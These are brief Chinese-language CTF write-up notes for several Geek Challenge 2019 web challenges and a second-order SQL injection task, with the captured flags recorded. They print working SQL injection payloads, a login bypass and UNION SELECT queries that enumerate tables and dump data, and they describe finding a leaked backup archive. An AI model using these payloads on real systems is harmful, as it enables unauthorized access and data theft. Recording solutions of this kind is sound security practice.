[极客大挑战 2019]EasySQL
password输入存在注入: 123'or 1=1 --'
flag{68144110-18b9-4882-93f1-6f6e7b1c67ec}
[极客大挑战 2019]Havefun
看网页源码,发现尾部有一段注释得代码,尝试 /?cat=dog,回显得flag{01c680f5-0d62-4e2c-a805-cfcf6b9252db}
[极客大挑战 2019]PHP
根据页面提示“我有一个良好的备份网站的习惯”,从网站下载www.zip,发现flag.php,得:Syc{dog_dog_dog_dog}
October 2019 Twice SQL Injection
审计源码。
1> 使用 1' union select group_concat(table_name) from information_schema.tables where table_schema=database() # 作为用户名,注册,然后登陆,获得三张表名:flag,news,users
2> 使用 1' union select concat(flag) from flag # 作为用户名,注册,然后登陆,获得flag
flag{fa7f6f08-c2cc-4c72-8ed7-1993959cd35c}